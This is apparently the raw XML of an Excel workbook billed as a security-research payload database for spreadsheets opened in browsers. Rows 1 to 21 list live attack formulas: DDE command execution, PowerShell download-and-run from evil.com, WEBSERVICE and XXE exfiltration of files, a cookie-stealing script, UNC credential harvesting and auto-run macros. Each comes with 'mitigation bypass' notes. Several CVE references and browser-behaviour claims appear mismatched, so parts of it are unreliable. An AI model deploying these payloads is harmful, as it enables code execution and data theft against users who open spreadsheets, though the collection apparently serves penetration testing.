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Excel Browser Payloads" sheetId="1" state="visible" r:id="rId1"/>
    <sheet name="Chrome Excel Payloads" sheetId="2" state="visible" r:id="rId2"/>
    <sheet name="Office365_Web Excel Payloads" sheetId="3" state="visible" r:id="rId3"/>
    <sheet name="Firefox Excel Payloads" sheetId="4" state="visible" r:id="rId4"/>
    <sheet name="Safari Excel Payloads" sheetId="5" state="visible" r:id="rId5"/>
    <sheet name="Edge Excel Payloads" sheetId="6" state="visible" r:id="rId6"/>
    <sheet name="Google_Sheets Excel Payloads" sheetId="7" state="visible" r:id="rId7"/>
    <sheet name="Excel Category Analysis" sheetId="8" state="visible" r:id="rId8"/>
    <sheet name="Excel CVE References" sheetId="9" state="visible" r:id="rId9"/>
    <sheet name="Excel Research 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color rgb="00FF0000"/>
    </font>
    <font>
      <b val="1"/>
    </font>
    <font>
      <b val="1"/>
      <color rgb="00FFFFFF"/>
    </font>
    <font>
      <b val="1"/>
      <sz val="14"/>
    </font>
    <font>
      <b val="1"/>
      <color rgb="002F5597"/>
    </font>
    <font>
      <color rgb="004472C4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C5504B"/>
        <bgColor rgb="00C550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5" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="5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50" customWidth="1" min="1" max="1"/>
    <col width="27" customWidth="1" min="2" max="2"/>
    <col width="15" customWidth="1" min="3" max="3"/>
    <col width="14" customWidth="1" min="4" max="4"/>
    <col width="35" customWidth="1" min="5" max="5"/>
    <col width="50" customWidth="1" min="6" max="6"/>
    <col width="50" customWidth="1" min="7" max="7"/>
    <col width="12" customWidth="1" min="8" max="8"/>
    <col width="48" customWidth="1" min="9" max="9"/>
    <col width="50" customWidth="1" min="10" max="10"/>
    <col width="50" customWidth="1" min="11" max="11"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Excel Browser Rendering Payload Database - Security Research</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Generated: 2025-07-27 15:29:02 UTC</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Focus: Excel files rendered in web browsers</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="inlineStr">
        <is>
          <t>Total Payloads: 60</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="inlineStr">
        <is>
          <t>Target Formats: xls, xlsx, xlsm, xlsb</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>LEGAL NOTICE: For authorized security testing only</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>id</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>category</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>browser</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>excel_format</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>technique</t>
        </is>
      </c>
      <c r="F7" t="inlineStr">
        <is>
          <t>payload</t>
        </is>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>description</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>risk_level</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>cve_reference</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>browser_behavior</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>mitigation_bypass</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="3" t="inlineStr">
        <is>
          <t>excel_browser_0001</t>
        </is>
      </c>
      <c r="B8" s="3" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C8" s="3" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D8" s="3" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E8" s="3" t="inlineStr">
        <is>
          <t>dde_command_execution</t>
        </is>
      </c>
      <c r="F8" s="3">
        <f>cmd|'/c calc.exe'!A1</f>
        <v/>
      </c>
      <c r="G8" s="3" t="inlineStr">
        <is>
          <t>Excel 97-2003 DDE (Dynamic Data Exchange) command execution in Chrome when opened from web</t>
        </is>
      </c>
      <c r="H8" s="3" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I8" s="3" t="inlineStr">
        <is>
          <t>CVE-2017-8759, CVE-2017-11826, CVE-2018-0802</t>
        </is>
      </c>
      <c r="J8" s="3" t="inlineStr">
        <is>
          <t>Chrome opens legacy Excel files directly, DDE formulas can execute system commands</t>
        </is>
      </c>
      <c r="K8" s="3" t="inlineStr">
        <is>
          <t>Legacy .xls format has minimal security warnings in older browser versions</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>excel_browser_0002</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>webservice_external_data</t>
        </is>
      </c>
      <c r="F9">
        <f>WEBSERVICE("https://evil.com/exfil?data="&amp;A1)</f>
        <v/>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Office 365 Web Excel WEBSERVICE function for data exfiltration</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>CVE-2019-1155, CVE-2020-1193</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Office 365 web app executes WEBSERVICE formulas with user data</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Trusted domain lists often include legitimate-looking domains</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>excel_browser_0003</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>auto_open_macro</t>
        </is>
      </c>
      <c r="F10" t="inlineStr">
        <is>
          <t>Sub Auto_Open()
Shell "powershell -enc &lt;base64_payload&gt;"
End Sub</t>
        </is>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Firefox Excel macro auto-execution via xlsm file download</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>CVE-2021-40444, CVE-2021-42292</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Firefox downloads xlsm files, Excel opens with macro execution if enabled</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>Social engineering to enable macros, trusted publisher certificates</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>excel_browser_0004</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>external_data_query</t>
        </is>
      </c>
      <c r="F11" t="inlineStr">
        <is>
          <t>&lt;dataSource&gt;&lt;connection&gt;&lt;connectionString&gt;Provider=Microsoft.ACE.OLEDB.12.0;Data Source=\\evil.com\share\malicious.xlsx&lt;/connectionString&gt;&lt;/connection&gt;&lt;/dataSource&gt;</t>
        </is>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Safari Excel external data connection to UNC path for credential harvesting</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>CVE-2018-8574, CVE-2019-1446</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Safari opens Excel files with external data connections, attempts UNC authentication</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>UNC paths bypass typical URL filtering, harvest NTLM credentials</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>excel_browser_0005</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E12" t="inlineStr">
        <is>
          <t>xxe_injection</t>
        </is>
      </c>
      <c r="F12" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE x [&lt;!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts"&gt;]&gt;&lt;x&gt;&amp;xxe;&lt;/x&gt;</t>
        </is>
      </c>
      <c r="G12" t="inlineStr">
        <is>
          <t>Edge Excel XXE injection via malformed xlsx (zip with XML) to read local files</t>
        </is>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I12" t="inlineStr">
        <is>
          <t>CVE-2018-8636, CVE-2019-0540</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Edge processes xlsx XML content, XXE can read local files</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>xlsx format masks XML content, trusted file extension</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>excel_browser_0006</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E13" t="inlineStr">
        <is>
          <t>formula_injection_csv</t>
        </is>
      </c>
      <c r="F13">
        <f>cmd|'/c powershell IEX(wget https://evil.com/payload.ps1 -UseBasicParsing).Content'!A1</f>
        <v/>
      </c>
      <c r="G13" t="inlineStr">
        <is>
          <t>Google Sheets CSV import with formula injection for remote payload execution</t>
        </is>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I13" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Google Sheets processes CSV formulas, can execute via import feature</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>CSV appears as data file, formula execution in cloud environment</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>excel_browser_0007</t>
        </is>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D14" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E14" t="inlineStr">
        <is>
          <t>excel_activex_browser</t>
        </is>
      </c>
      <c r="F14" t="inlineStr">
        <is>
          <t>&lt;script&gt;try{parent.window.location='https://evil.com/harvest?cookie='+document.cookie}catch(e){}&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G14" t="inlineStr">
        <is>
          <t>Chrome Excel ActiveX control DOM access when embedded in web page</t>
        </is>
      </c>
      <c r="H14" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I14" t="inlineStr">
        <is>
          <t>CVE-2019-1367, CVE-2020-1380</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>Chrome Excel plugin can access parent DOM in certain configurations</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>ActiveX trusted sites, embedded Excel objects in web pages</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="inlineStr">
        <is>
          <t>excel_browser_0008</t>
        </is>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D15" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E15" t="inlineStr">
        <is>
          <t>hyperlink_injection</t>
        </is>
      </c>
      <c r="F15">
        <f>HYPERLINK("https://evil.com/redirect","Click Here")</f>
        <v/>
      </c>
      <c r="G15" t="inlineStr">
        <is>
          <t>Firefox Excel legacy hyperlink injection for phishing and tracking</t>
        </is>
      </c>
      <c r="H15" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I15" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
      <c r="J15" t="inlineStr">
        <is>
          <t>Firefox processes Excel hyperlinks, can redirect to malicious sites</t>
        </is>
      </c>
      <c r="K15" t="inlineStr">
        <is>
          <t>Legitimate-looking hyperlink text, trusted Excel file source</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" t="inlineStr">
        <is>
          <t>excel_browser_0009</t>
        </is>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C16" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D16" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E16" t="inlineStr">
        <is>
          <t>workbook_open_event</t>
        </is>
      </c>
      <c r="F16" t="inlineStr">
        <is>
          <t>Private Sub Workbook_Open()
CreateObject("WScript.Shell").Run "powershell -windowstyle hidden -exec bypass -c &lt;payload&gt;"
End Sub</t>
        </is>
      </c>
      <c r="G16" t="inlineStr">
        <is>
          <t>Office 365 Web Excel macro execution via Workbook_Open event handler</t>
        </is>
      </c>
      <c r="H16" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I16" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-31201</t>
        </is>
      </c>
      <c r="J16" t="inlineStr">
        <is>
          <t>Office 365 web can execute macros if user enables macro execution</t>
        </is>
      </c>
      <c r="K16" t="inlineStr">
        <is>
          <t>Legitimate-looking business document, macro enable prompts</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" t="inlineStr">
        <is>
          <t>excel_browser_0010</t>
        </is>
      </c>
      <c r="B17" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C17" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D17" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E17" t="inlineStr">
        <is>
          <t>ole_object_embedding</t>
        </is>
      </c>
      <c r="F17" t="inlineStr">
        <is>
          <t>Embedded OLE object: {binary data containing malicious payload}</t>
        </is>
      </c>
      <c r="G17" t="inlineStr">
        <is>
          <t>Safari Excel binary format OLE object embedding for payload delivery</t>
        </is>
      </c>
      <c r="H17" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I17" t="inlineStr">
        <is>
          <t>CVE-2020-1563, CVE-2021-31939</t>
        </is>
      </c>
      <c r="J17" t="inlineStr">
        <is>
          <t>Safari processes xlsb binary format, can execute embedded OLE objects</t>
        </is>
      </c>
      <c r="K17" t="inlineStr">
        <is>
          <t>Binary format obfuscates payload, OLE objects appear as legitimate content</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" t="inlineStr">
        <is>
          <t>excel_browser_0011</t>
        </is>
      </c>
      <c r="B18" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C18" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D18" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E18" t="inlineStr">
        <is>
          <t>rtd_server_abuse</t>
        </is>
      </c>
      <c r="F18">
        <f>RTD("progid","","command","calc.exe")</f>
        <v/>
      </c>
      <c r="G18" t="inlineStr">
        <is>
          <t>Edge Excel Real-Time Data (RTD) server abuse for command execution</t>
        </is>
      </c>
      <c r="H18" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I18" t="inlineStr">
        <is>
          <t>CVE-2017-8570, CVE-2018-0798</t>
        </is>
      </c>
      <c r="J18" t="inlineStr">
        <is>
          <t>Edge Excel RTD formulas can execute external programs via COM objects</t>
        </is>
      </c>
      <c r="K18" t="inlineStr">
        <is>
          <t>RTD appears as legitimate Excel function, registry-based COM execution</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" t="inlineStr">
        <is>
          <t>excel_browser_0012</t>
        </is>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C19" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D19" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E19" t="inlineStr">
        <is>
          <t>shared_strings_xxe</t>
        </is>
      </c>
      <c r="F19" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE sharedStrings [&lt;!ENTITY xxe SYSTEM "http://evil.com/exfil?data=file:///etc/passwd"&gt;]&gt;&lt;sst&gt;&amp;xxe;&lt;/sst&gt;</t>
        </is>
      </c>
      <c r="G19" t="inlineStr">
        <is>
          <t>Chrome Excel shared strings XXE for data exfiltration via HTTP requests</t>
        </is>
      </c>
      <c r="H19" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I19" t="inlineStr">
        <is>
          <t>CVE-2019-0669, CVE-2020-0674</t>
        </is>
      </c>
      <c r="J19" t="inlineStr">
        <is>
          <t>Chrome processes xlsx shared strings XML, XXE can exfiltrate data via HTTP</t>
        </is>
      </c>
      <c r="K19" t="inlineStr">
        <is>
          <t>Excel shared strings appear as normal data, HTTP exfiltration to external server</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" t="inlineStr">
        <is>
          <t>excel_browser_0013</t>
        </is>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C20" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D20" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E20" t="inlineStr">
        <is>
          <t>dynamic_data_exchange</t>
        </is>
      </c>
      <c r="F20" t="inlineStr">
        <is>
          <t>@SUM(1+1)*cmd|'/c powershell -enc &lt;base64&gt;'!A0</t>
        </is>
      </c>
      <c r="G20" t="inlineStr">
        <is>
          <t>Office 365 Web CSV injection with DDE for remote command execution</t>
        </is>
      </c>
      <c r="H20" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I20" t="inlineStr">
        <is>
          <t>CVE-2017-8759, CVE-2018-0802</t>
        </is>
      </c>
      <c r="J20" t="inlineStr">
        <is>
          <t>Office 365 processes CSV DDE formulas, can execute system commands</t>
        </is>
      </c>
      <c r="K20" t="inlineStr">
        <is>
          <t>CSV format trusted for data import, DDE appears as calculation</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" t="inlineStr">
        <is>
          <t>excel_browser_0014</t>
        </is>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C21" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D21" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E21" t="inlineStr">
        <is>
          <t>iframe_injection</t>
        </is>
      </c>
      <c r="F21" t="inlineStr">
        <is>
          <t>Sub IframeInject()
CreateObject("InternetExplorer.Application").Navigate("javascript:parent.frames[0].location='https://evil.com'")
End Sub</t>
        </is>
      </c>
      <c r="G21" t="inlineStr">
        <is>
          <t>Firefox Excel macro iframe injection for parent frame navigation control</t>
        </is>
      </c>
      <c r="H21" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I21" t="inlineStr">
        <is>
          <t>CVE-2019-11707, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J21" t="inlineStr">
        <is>
          <t>Firefox Excel macros can create IE objects for DOM manipulation</t>
        </is>
      </c>
      <c r="K21" t="inlineStr">
        <is>
          <t>Macro appears to create legitimate browser automation, parent frame access</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" t="inlineStr">
        <is>
          <t>excel_browser_0015</t>
        </is>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C22" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D22" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E22" t="inlineStr">
        <is>
          <t>importxml_injection</t>
        </is>
      </c>
      <c r="F22">
        <f>IMPORTXML("https://evil.com/xml", "//script")</f>
        <v/>
      </c>
      <c r="G22" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTXML function abuse for script injection via external XML</t>
        </is>
      </c>
      <c r="H22" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I22" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30563</t>
        </is>
      </c>
      <c r="J22" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTXML can fetch and process external XML with scripts</t>
        </is>
      </c>
      <c r="K22" t="inlineStr">
        <is>
          <t>IMPORTXML appears as data import function, external XML contains script payload</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" t="inlineStr">
        <is>
          <t>excel_browser_0016</t>
        </is>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C23" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D23" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E23" t="inlineStr">
        <is>
          <t>binary_formula_obfuscation</t>
        </is>
      </c>
      <c r="F23" t="inlineStr">
        <is>
          <t>{Binary encoded: =INDIRECT("R"&amp;ROW()&amp;"C"&amp;COLUMN(),FALSE)&amp;CHAR(61)&amp;"cmd|'/c calc'!A1"}</t>
        </is>
      </c>
      <c r="G23" t="inlineStr">
        <is>
          <t>Safari Excel binary format formula obfuscation for AV evasion</t>
        </is>
      </c>
      <c r="H23" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I23" t="inlineStr">
        <is>
          <t>CVE-2020-1563, CVE-2021-31939</t>
        </is>
      </c>
      <c r="J23" t="inlineStr">
        <is>
          <t>Safari processes xlsb binary formulas, obfuscation bypasses detection</t>
        </is>
      </c>
      <c r="K23" t="inlineStr">
        <is>
          <t>Binary encoding hides malicious formulas, appears as legitimate calculation</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" t="inlineStr">
        <is>
          <t>excel_browser_0017</t>
        </is>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C24" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D24" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E24" t="inlineStr">
        <is>
          <t>excel4_macro_abuse</t>
        </is>
      </c>
      <c r="F24">
        <f>EXEC("powershell -windowstyle hidden -c &lt;payload&gt;")</f>
        <v/>
      </c>
      <c r="G24" t="inlineStr">
        <is>
          <t>Edge Excel 4.0 macro execution for legacy bypass techniques</t>
        </is>
      </c>
      <c r="H24" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I24" t="inlineStr">
        <is>
          <t>CVE-2020-0760, CVE-2020-1464</t>
        </is>
      </c>
      <c r="J24" t="inlineStr">
        <is>
          <t>Edge supports Excel 4.0 macros for legacy compatibility, EXEC function available</t>
        </is>
      </c>
      <c r="K24" t="inlineStr">
        <is>
          <t>Excel 4.0 macros bypass modern macro security, appear as calculations</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" t="inlineStr">
        <is>
          <t>excel_browser_0018</t>
        </is>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C25" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D25" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E25" t="inlineStr">
        <is>
          <t>workbook_xml_xxe</t>
        </is>
      </c>
      <c r="F25" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE workbook [&lt;!ENTITY xxe SYSTEM "https://evil.com/exfil?data=file:///windows/system32/drivers/etc/hosts"&gt;]&gt;&lt;workbook&gt;&amp;xxe;&lt;/workbook&gt;</t>
        </is>
      </c>
      <c r="G25" t="inlineStr">
        <is>
          <t>Office 365 Web Excel workbook XML XXE for file disclosure via HTTP exfiltration</t>
        </is>
      </c>
      <c r="H25" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I25" t="inlineStr">
        <is>
          <t>CVE-2019-0540, CVE-2020-1342</t>
        </is>
      </c>
      <c r="J25" t="inlineStr">
        <is>
          <t>Office 365 web processes workbook XML, XXE can read and exfiltrate files</t>
        </is>
      </c>
      <c r="K25" t="inlineStr">
        <is>
          <t>Cloud environment XXE, HTTP exfiltration to external server</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" t="inlineStr">
        <is>
          <t>excel_browser_0019</t>
        </is>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C26" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D26" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E26" t="inlineStr">
        <is>
          <t>nested_formula_injection</t>
        </is>
      </c>
      <c r="F26">
        <f>1+1+cmd|'/c powershell -exec bypass -c "IEX(wget https://evil.com/payload -UseBasicParsing).Content"'!A1</f>
        <v/>
      </c>
      <c r="G26" t="inlineStr">
        <is>
          <t>Chrome CSV nested formula injection for remote PowerShell payload execution</t>
        </is>
      </c>
      <c r="H26" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I26" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418</t>
        </is>
      </c>
      <c r="J26" t="inlineStr">
        <is>
          <t>Chrome processes CSV formulas when opening in Excel, nested execution bypasses simple filters</t>
        </is>
      </c>
      <c r="K26" t="inlineStr">
        <is>
          <t>Nested formula structure evades basic detection, PowerShell download and execute</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" t="inlineStr">
        <is>
          <t>excel_browser_0020</t>
        </is>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C27" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D27" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E27" t="inlineStr">
        <is>
          <t>safari_webkit_bridge</t>
        </is>
      </c>
      <c r="F27" t="inlineStr">
        <is>
          <t>Sub WebKitBridge()
CreateObject("Safari.Application").Do("javascript:window.location='https://evil.com/harvest?data='+btoa(document.innerHTML)")
End Sub</t>
        </is>
      </c>
      <c r="G27" t="inlineStr">
        <is>
          <t>Safari Excel macro WebKit bridge abuse for DOM access and data harvesting</t>
        </is>
      </c>
      <c r="H27" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I27" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J27" t="inlineStr">
        <is>
          <t>Safari Excel macros can interact with WebKit for JavaScript execution</t>
        </is>
      </c>
      <c r="K27" t="inlineStr">
        <is>
          <t>Macro appears to interact with Safari legitimately, DOM data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" t="inlineStr">
        <is>
          <t>excel_browser_0021</t>
        </is>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C28" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D28" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E28" t="inlineStr">
        <is>
          <t>mscomctl_activex_abuse</t>
        </is>
      </c>
      <c r="F28">
        <f>mscomctl|'ocx.CommonDialog'!A1</f>
        <v/>
      </c>
      <c r="G28" t="inlineStr">
        <is>
          <t>Firefox Excel legacy ActiveX CommonDialog abuse for file system access</t>
        </is>
      </c>
      <c r="H28" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I28" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
